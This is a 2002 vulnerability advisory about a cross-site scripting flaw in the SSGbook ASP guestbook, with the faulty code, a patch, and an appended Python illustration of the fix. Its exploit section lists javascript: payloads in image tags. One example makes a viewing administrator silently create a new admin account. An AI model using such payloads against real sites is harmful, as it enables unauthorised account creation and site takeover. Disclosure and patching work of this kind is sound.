SSGbook (ASP)

2002-10-08T00:00:00
ID SECURITYVULNS:DOC:3601
Type securityvulns
Reporter Securityvulns
Modified 2002-10-08T00:00:00

Description

Information :
°°°°°°°°°°°°°°

Product : SSGbook
Language : ASP
Tested version : 1
Website : http://www.script-shed.com
Problem : Cross Site Scripting

ASP Code / location :
°°°°°°°°°°°°°°°°°°°°°

----------------- config.asp ----------------------

    fString = doCode(fString, "[img]","[/img]","<img src=""",""" border=0>")
    fString = doCode(fString, "[image]","[/image]","<img src=""",""" border=0>")
    fString = doCode(fString, "[img=right]","[/img=right]","<img align=right src=""",""" id=right border=0>")
    fString = doCode(fString, "[image=right]","[/image=right]","<img align=right src=""",""" id=right border=0>")
    fString = doCode(fString, "[img=left]","[/img=left]","<img align=left src=""",""" id=left border=0>")
    fString = doCode(fString, "[image=left]","[/image=left]","<img align=left src=""",""" id=left border=0>")

----------------- config.asp ----------------------

Exploit :
°°°°°°°°°

    [image]javascript:{SCRIPT}[/image]
    [img=right]javascript:{SCRIPT}[/img=right]
    [image=right]javascript:{SCRIPT}[/image=right]
    [img=left]javascript:{SCRIPT}[/img=left]
    [image=left]javascript:{SCRIPT}[/image=left]
    [img]javascript:{SCRIPT}[/img]

e.g. : [image]javascript:document.location="ss_admin.asp?Mode=Update&Acton=Access&UserName=Pom&Password=turlututu";[/image]

This adds an admin if an admin reads it. Login : Pom, Password : turlututu

Patch :
°°°°°°°

In config.asp, add this line :

    strOutput = Replace(strOutput, chr(34), "&quot;")

after

    strOutput = Replace(strOutput, "<", "&lt;")
    strOutput = Replace(strOutput, ">", "&gt;")


And replace these lines :


    fString = doCode(fString, "[img]","[/img]","<img src=""",""" border=0>")
    fString = doCode(fString, "[image]","[/image]","<img src=""",""" border=0>")
    fString = doCode(fString, "[img=right]","[/img=right]","<img align=right src=""",""" id=right border=0>")
    fString = doCode(fString, "[image=right]","[/image=right]","<img align=right src=""",""" id=right border=0>")
    fString = doCode(fString, "[img=left]","[/img=left]","<img align=left src=""",""" id=left border=0>")
    fString = doCode(fString, "[image=left]","[/image=left]","<img align=left src=""",""" id=left border=0>")


with :


    fString = doCode(fString, "[img]http://","[/img]","<img src=""http://",""" border=0>")
    fString = doCode(fString, "[image]http://","[/image]","<img src=""http://",""" border=0>")
    fString = doCode(fString, "[img=right]http://","[/img=right]","<img align=right src=""http://",""" id=right border=0>")
    fString = doCode(fString, "[image=right]http://","[/image=right]","<img align=right src=""http://",""" id=right border=0>")
    fString = doCode(fString, "[img=left]http://","[/img=left]","<img align=left src=""http://",""" id=left border=0>")
    fString = doCode(fString, "[image=left]http://","[/image=left]","<img align=left src=""http://",""" id=left border=0>")
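What the two parts of the patch change, as an added example in Python (not SSGbook's code and not from the advisory). Assumptions: doCode's source is not shown above, so do_code models it as a plain "replace each opening/closing tag pair with the given HTML" helper, and the escaping is assumed to run before the tag conversion; the example.com entries are constructed.

```python
def do_code(text, open_tag, close_tag, open_html, close_html):
    """Assumed doCode behaviour: turn each open_tag...close_tag pair into HTML."""
    out, pos = [], 0
    while True:
        start = text.find(open_tag, pos)
        end = text.find(close_tag, start + len(open_tag)) if start != -1 else -1
        if end == -1:                       # no complete pair left
            out.append(text[pos:])
            return "".join(out)
        out.append(text[pos:start])
        out.append(open_html + text[start + len(open_tag):end] + close_html)
        pos = end + len(close_tag)


def escape_angles(s):
    # Filtering the advisory shows as already present in config.asp.
    return s.replace("<", "&lt;").replace(">", "&gt;")


def render_original(entry):
    return do_code(escape_angles(entry), "[img]", "[/img]",
                   '<img src="', '" border=0>')


def render_patched(entry):
    s = escape_angles(entry).replace('"', "&quot;")   # the added chr(34) line
    return do_code(s, "[img]http://", "[/img]",
                   '<img src="http://', '" border=0>')


# Constructed sample entries; {SCRIPT} is the advisory's own placeholder.
SAMPLES = {
    "script_url": "[img]javascript:{SCRIPT}[/img]",
    "quote": '[img]http://example.com/a.gif" x="y[/img]',
    "normal": "[img]http://example.com/a.gif[/img]",
}

if __name__ == "__main__":
    for name, entry in SAMPLES.items():
        print(name)
        print("  original:", render_original(entry))
        print("  patched :", render_patched(entry))
```

With the patched rules, an [img] value that does not begin with http:// (https:// included) is left as literal text, and a double quote inside the URL can no longer close the src attribute.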


More details in french : http://www.frog-man.org/tutos/SSGbook.txt

translated by Google : http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FSSGbook.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools

frog-m@n

